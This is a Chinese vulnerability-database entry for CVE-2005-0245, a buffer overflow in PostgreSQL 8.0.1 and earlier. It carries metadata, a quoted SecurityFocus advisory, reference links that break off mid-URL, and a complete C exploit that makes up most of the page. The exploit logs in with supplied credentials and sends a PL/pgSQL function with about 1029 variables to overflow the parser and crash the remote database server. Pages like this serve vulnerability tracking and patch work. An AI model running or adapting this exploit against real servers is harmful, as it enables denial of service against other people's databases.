PostgreSQL gram.y 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108428 漏洞类型 缓冲区溢出
发布时间 2005-02-01 更新时间 2005-10-25
CVE编号 CVE-2005-0245 CNNVD-ID CNNVD-200502-002
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25076
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200502-002
|漏洞详情
PostgreSQL是一个自由的对象-关系数据库服务器(数据库管理系统)。PostgreSQL8.0.0及更早版本的gram.y中的缓冲区溢出,可让攻击者通过refcursor函数(gram.y)的大量参数执行任意代码,这会导致基于数据堆的缓冲区溢出,它是与CVE-2005-0247不同的漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/12417/info

Multiple remote vulnerabilities affect PostgreSQL. These issues are due to design errors, buffer-mismanagement errors, and causes that are currently unspecified.

The vulnerabilities are as follows:

- The application fails to enforce function permissions.
- A buffer overflow is triggered when cursor declaration occurs.
- A denial-of-service issue resides in 'contrib/intagg'.

Not enough information is currently available to provide a more in-depth technical description. This BID will be updated when more details are available.

An attacker may leverage these issues to execute arbitrary code with the privileges of the vulnerable database process and to execute functions without requiring permission. Other attacks are also possible. 

/* PostgreSQL Remote Reboot <=8.01 
 * writen by ChoiX [choix@unl0ck.org]
 * (c) Unl0ck Research Team [www.unl0ck.org]
 *	info: Server can be rebooted only if plpgsql language is switched on.
 *		To compilate exploit you should have "libpq" library on your box 
 *		and use command $ cc -o pgsql_reboot pgsql_reboot.c -I/usr/local/pgsql/include  -L/usr/local/pgsql/lib -lpq
 *		Root exploits will be released later, coz now it's very dangerous to release it.
 *	greets to: 
 *			unl0ck members: DarkEagle, crash-x, nekd0, xtix, [0xdeadbabe]
 *			m00 members: ov3r 
 */
#include <stdio.h>
#include <getopt.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <libpq-fe.h>

#define DEFAULT_PORT "5321"
#define DEFAULT_DB "postgresql"
#define FUNC_NAME "uKt_test"
#define TABLE_NAME "unl0ck_table" 

char str[4000];
char create[]="CREATE OR REPLACE FUNCTION %s RETURNS integer AS $$\n";
char declare[] = "DECLARE\n";
char com[] = "\t--%\n";
char varible_REC[] = "\trec RECORD;\n";
char varible_var[] = "\tvar%d varchar := \'BBBB\';\n";
char begin[] = "BEGIN\n";
char select_1[] = "SELECT INTO rec FROM %s WHERE\n";
char select_2[] = "var%d = AAAA AND\n";
char select_3[] = "var1029 = AAAA;\n";
char end[] = "END\n";
char finish[] = "$$ LANGUAGE plpgsql\n";


void usage(char *name){
printf("PostgreSQL Remote DoS <=8.0.1\n");
printf("writen by ChoiX [choix@unl0ck.org]\n");
printf("(c) Unl0ck Research Team [info@unl0ck.org]\n");
printf("Usage: %s -H <host_address> [-P <port>] -u <user_name> -p <password> [-d <database_name>] \n", name);
printf("Default port = %s\nDefault dbname = %s\n", DEFAULT_PORT, DEFAULT_DB);
exit(0);
}

int make_str();

int main(int argc, char *argv[]){
char opt;
char *host = NULL, *port = NULL, *user = NULL, *password = NULL, *dbname = NULL;
struct hostent *he;
PGconn *conn;
PGresult *res;

while((opt = getopt(argc, argv, "H:P:u:p:d:")) != EOF){
	switch(opt){
		case 'H':
			host = optarg;
			break;
		case 'P':
			port = optarg;
			break;
		case 'u':
			user = optarg;
			break;
		case 'p':
			password = optarg;
			break;
		case 'd':
			dbname = optarg;
			break;
		default:
			usage(argv[0]);
			break;
	}
}
if(host == NULL) usage(argv[0]);
if(user == NULL) usage(argv[0]);
if(password == NULL) usage(argv[0]);
if(port == NULL) port = DEFAULT_PORT; 
if(dbname == NULL) dbname = DEFAULT_DB;

printf("\tPostgreSQL Remote DoS <=8.0.1\n");
printf("[*] Host/Port: %s/%s\n", host, port);
printf("[*] DBname/User/Password: %s/%s/%s\n", dbname, user, password); 

conn = PQsetdbLogin(host, port, NULL, NULL, dbname, user, password);
if(PQstatus(conn) == CONNECTION_BAD){
	PQfinish(conn);
	printf("[-] Cannot connect to the database\n");
	exit(1);
}
printf("[+] Connected to the database\n");

make_str();
printf("[+] Command has been generated\n");
res = PQexec(conn, str);
if (PQresultStatus(res) == PGRES_TUPLES_OK){
	printf("[+] Command has been sent\n");
}
if(PQstatus(conn) == CONNECTION_BAD){
	printf("[+] Server has been rebooted\n");
	exit(0);
} else {
	printf("[-] Server hasnt been rebooted\n");
	exit(0);
}
}

int make_str(){
char temp[100];
int i;
int len = sizeof(temp) -1;

//write char create[]
snprintf(temp, len, create, FUNC_NAME); 
strcpy(str,temp);
//write char declare[] 
snprintf(temp, len, begin);
strcat(str, temp);
//write char varible_REC[]
snprintf(temp, len, varible_REC);
strcat(str, temp);
//write char varible_var[]
for(i = 0;i < 1029;i++){
	snprintf(temp, len, varible_var, i);
	strcat(str, temp);
}
//write char begin[]
snprintf(temp, len, begin);
strcat(str, temp);
//write char select_1[]
snprintf(temp, len, select_1, TABLE_NAME);
strcat(str, temp);
//write char select_2[]
for(i = 0;i < 1028;i++){
	snprintf(temp, len, select_2, i);
	strcat(str, temp);
}
//write char select_3[]
snprintf(temp, len, select_3);
strcat(str, temp);
//write char end[]
snprintf(temp, len, temp);
strcat(str, temp);
//write char finish[]
snprintf(temp, len, finish);
strcat(str,temp);

return 0;
}
|参考资料

来源:XF
名称:postgresql-cursor-bo(19188)
链接:http://xforce.iss.net/xforce/xfdb/19188
来源:REDHAT
名称:RHSA-2005:150
链接:http://www.redhat.com/support/errata/RHSA-2005-150.html
来源:REDHAT
名称:RHSA-2005:138
链接:http://www.redhat.com/support/errata/RHSA-2005-138.html
来源:SECUNIA
名称:12948
链接:http://secunia.com/advisories/12948
来源:DEBIAN
名称:DSA-683
链接:http://www.debian.org/security/2005/dsa-683
来源:BUGTRAQ
名称:20050210[USN-79-1]PostgreSQLvulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110806034116082&w=2
来源:MLIST
名称:[pgsql-patches]20050120Re:WIP:pl/pgsqlcleanup
链接:http://archives.postgresql.org/pgsql-patches/2005-01/msg00216.php
来源:MLIST
名称:[pgsql-committers]20050207pgsql:Prevent4morebufferoverrunsinthePL/PgSQLparser.
链接:http://archives.postgresql.org/pgsql-committers/2005-02/msg00049.php
来源:MLIST
名称:[pgsql-committers]20050121pgsql:Preventoverrunningaheap-allocatedbufferismorethan1024
链接:http://archives.postgresql.org/pgsql-committers/2005-01/msg00298.php
来源:BID
名称:12417
链接:http://www.securit